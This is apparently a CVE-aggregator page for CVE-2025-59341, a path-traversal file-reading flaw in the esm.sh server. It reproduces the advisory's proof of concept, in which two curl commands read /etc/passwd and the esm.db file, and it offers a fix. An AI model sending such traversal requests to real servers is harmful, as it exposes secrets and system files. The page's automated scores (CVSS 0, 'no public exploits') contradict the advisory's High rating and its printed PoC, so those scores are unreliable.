What is CVE-2025-59341?

## Summary A Local File Inclusion (LFI) issue was identified in the esm.sh service URL handling. An attacker could craft a request that causes the server to read and return files from the host filesystem (or other unintended file sources). **Severity:** High — LFI can expose secrets, configuration files, credentials, or enable further compromise. **Impact:** reading configuration files, private keys, environment files, or other sensitive files; disclosure of secrets or credentials; information leakage that could enable further attacks. Vulnerable code snippet is in this file: https://github.com/esm-dev/esm.sh/blob/c62f191d32639314ff0525d1c3c0e19ea2b16143/server/router.go#L1168 --- ## Proof of Concept 1. Using this default config file that I copy from the repo, the server is running at `http://localhost:9999` with this command `go run server/esmd/main.go --config=config.json` ```json { "port": 9999, "npmRegistry": "https://registry.npmjs.org/", "npmToken": "******" } ``` 2. Trigger the LFI vulnerability by sending this command below to read a local file ```bash # read /etc/passwd curl --path-as-is 'http://localhost:9999/pr/x/y@99/../../../../../../../../../../etc/passwd?raw=1&module=1' # or read the database esm.db file curl --path-as-is 'http://localhost:9999/pr/x/y@99/../../../../../../../esm.db?raw=1&module=1' ``` --- ## Remediation Simply remove any `..` in the URL path before actually process the file. See more details in [this guide](https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html) ## Credits - [Ai Ho (Jessie)](https://github.com/j3ssie) - [CL Yang](https://github.com/A11riseforme)

What is the severity of CVE-2025-59341?

CVE-2025-59341 has a CVSS v3 score of 0, which is classified as Low severity.

Is there an exploit available for CVE-2025-59341?

No known public exploits are currently available for CVE-2025-59341.

Is there a patch available for CVE-2025-59341?

Yes, patches are available for CVE-2025-59341. Check the vendor advisories for update instructions.

CVE-2025-59341 - CVE Details, Severity, and Analysis

Severity Scores

CVSS v30.0

CVSS v20.0

Priority Score0.0

EPSS Score0.0

None

Exploitation LikelihoodMinimal

0.00%EPSS

Very low probability of exploitation

Monitor and patch as resources allow

0.00%

EPSS

0.0

CVSS

No

Exploit

Yes

Patch

Low Priority

no major risk factors

EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.

Description

Summary

A Local File Inclusion (LFI) issue was identified in the esm.sh service URL handling. An attacker could craft a request that causes the server to read and return files from the host filesystem (or other unintended file sources).

Severity: High — LFI can expose secrets, configuration files, credentials, or enable further compromise. Impact: reading configuration files, private keys, environment files, or other sensitive files; disclosure of secrets or credentials; information leakage that could enable further attacks.

Vulnerable code snippet is in this file: https://github.com/esm-dev/esm.sh/blob/c62f191d32639314ff0525d1c3c0e19ea2b16143/server/router.go#L1168

Proof of Concept

Using this default config file that I copy from the repo, the server is running at http://localhost:9999 with this command go run server/esmd/main.go --config=config.json

{
  "port": 9999,
  "npmRegistry": "https://registry.npmjs.org/",
  "npmToken": "******"
}

Trigger the LFI vulnerability by sending this command below to read a local file

# read /etc/passwd
curl --path-as-is 'http://localhost:9999/pr/x/y@99/../../../../../../../../../../etc/passwd?raw=1&module=1'

# or read the database esm.db file
curl --path-as-is 'http://localhost:9999/pr/x/y@99/../../../../../../../esm.db?raw=1&module=1'

Remediation

Simply remove any .. in the URL path before actually process the file. See more details in this guide

Credits

CVSS v3 Breakdown

Attack Vector:-

Attack Complexity:-

Privileges Required:-

User Interaction:-

Scope:-

Confidentiality:-

Integrity:-

Availability:-

Patch References

Github.com